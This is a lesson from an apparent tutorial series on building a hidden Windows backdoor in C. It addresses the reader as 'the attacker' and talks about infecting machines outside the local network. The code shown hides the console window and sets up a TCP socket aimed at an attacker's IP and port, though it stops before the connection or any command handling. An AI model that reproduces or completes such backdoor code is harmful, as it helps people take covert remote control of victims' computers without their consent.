Creating our socket object

Let’s create the socket which will allow us to connect our server and our client.

The first thing we’ll need is to create a structure called “ServAddr” whose type will also be “sockaddr_in”. In C, a structure is defined and called as it is known as classes in other languages. We will also define the port in which the server is being executed, to do so, we’ll create a variable called “ServPort” whose type is an “unsigned int”.

The reason why we are creating these variables, is because we’ll need to define both the IP address and the port in which our backdoor will perform the connection to send and receive data.

Let’s create a new variable called “ServIP” whose type will be the pointer to a char. The code we’ve written in this lesson so far looks like this:

struct sockaddr_in ServAddr;
unsigned short ServPort;
char *ServIP;

Tip: For those who are not familiriased with C-based languages programming, a pointer is a variable that references a block or a space in memory.

The last variable we’ll need to create so far, will be called “wsaData” and its type will be “WSADATA”. WSADATA is a structure that contains information about Windows sockets, so this is something we’ll need to stablish a connection through sockets between server and client.

Once we’ve properly defined the previously mentioned variables, we’ll set to “ServIP” the IP address of the machine that will be sending data to the infected device, that’s you, the attacker. If you are going to be using virtual machines to perform tests, you must specify the IP address of the device you will be using, you can see your IP address by executing “ifconfig” in a terminal emulator, there will appear all of the network interfaces available, you should use the IP address of the interface you will be using when running the tests. If you will infect a windows Machine that is not in your local network, you must use your public IP address, you can get it by running “curl icanhazip.com” in a shell.

To assign the value to “ServIP”, in a new line, type:

ServIP = "[IP ADDRESS]"

In the same way, we’ll specify the port in which the server will be awaiting for the connection. To do so, we will need to assign a value to “ServPort” too, but, unlike “ServIP” this one is not of type “char”, this one is “int”, which means, that “ServPort” will only accept integer numbers. You can choose the port you want as long as it remains open and is not being used by some other application. I’ll be using the port 50005.

Once we have stored that information into our variables, we’ll use the “WSAStartup” inside of an “if” statement as it is shown below:

if(WSAStartup()) {
}

To this function, we’ll need to pass some arguments, the first one is a function called “MAKEWORD”, as it is a function, we’ll open another pair of brackets, inside of them we’ll write “2,0” and the second argument that “WSAStartup” requires is the memory block that “wsaData” is in.

To get the block of memory of a pointer variable, you write “&” before the variable name, for example: “&wsaData”

We’ll check if “WSAStartup(MAKEWORD(2,0), &wsaData)” is different to zero, if it is we’ll exit the program. This if statement looks like this:

if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0) {
  exit(1);
}

What we are doing, is check if the value that the function “WSAStartup” returns is equals to zero. If it is, what is inside of the if block will not be executed as the condition is not true, but if it is not zero, what is inside of the curly brackets (“{}”) will be executed, which means, the program will be stopped.

Once the program was being initialised properly and its execution was not stopped, we’ll create a socket object. To do, we’ll go out of the main function “WinMain” and we will define it there. Why? Simple, because we will need that same socket outside of the “WinMain” function, if we define it there, it would be only accessible for what is inside of that function.

When we are outside of the function, we will create an integer variable called “sock”.

Now, once we have defined our “sock” variable, we’ll return to the “WinMain” function and right below of our “if” comparison we’ll assign the following value to sock:

sock = socket(AF_INET, SOCK_STREAM, 0);

We are defining sock as a socket by using the function “socket”, this function takes three arguments, the first one “AF_INET” represents an IPv4 connection, the second parameter “SOCK_STREAM” represents a TCP connection and the third parameter is “0” as we don’t need anything else.

What we will need to do later, is to modify the paramters of “ServAddr” as it inherits the “sockaddr_in” values, but before we do that, we’ll need to turn into zeroes all of them, to do so we will need the “memset” function. This function takes three parameters, the first is the memory block that “ServAddr” uses (remember to use the “&”), the second parameter will be “0” as we want to turn all of the memory space that “ServAddr” uses into zeros and the third, is the size of the memory that is being use by “ServAddr” you can get it by simple passing “sizeof ServAddr”. That line would look like this:

memset(&ServAddr, 0, sizeof(ServAddr));

Now let’s add custom values to the “ServAddr” variables (to access to them we’ll need to use a dot “.” after the variable name). The first is “sin_family” whose value will be set to “AF_INET”, the second one is “sin_addr.s_addr” whose value will be the server’s IP address. We can’t use our variable “ServIP” as it is an string and not an IP address (that our C program can recognise), so we’ll convert it using a function called “inet_addr” and pass “ServIP” as argument. The last parameter will be “sin_port” and as it happened with the IP address we can’t simply use our variable “ServPort”, instead of using “inet_addr” we will use “htons” and we will pass “ServPort” as argument, in that way, our C program will recognise and be able to work with our port.

Our code so far looks like this:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <winsock2.h>
#include <windows.h>
#include <winuser.h>
#include <wininet.h>
#include <windowsx.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

int sock;

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow) {
  HWND stealth;
  AllocConsole();
  stealth = FindWindowA("ConsoleWindow", NULL);

  ShowWindow(stealth, 0);

  struct sockaddr_in ServAddr;
  unsigned short ServPort;
  char *ServIP;
  WSADATA wsaData;

  ServIP = "192.168.1.1";
  ServPort = 50005;

  if(WSAStartup(MAKEWORD(2,0), &wsaData) != 0) {
    exit(1);
  }

  sock = socket(AF_INET, SOCK_STREAM, 0);

  memset(&ServAddr, 0, sizeof(ServAddr));
  ServAddr.sin_family = AF_INET;
  ServAddr.sin_addr.s_addr = inet_addr(ServIP);
  ServAddr.sin_port = htons(ServPort);
}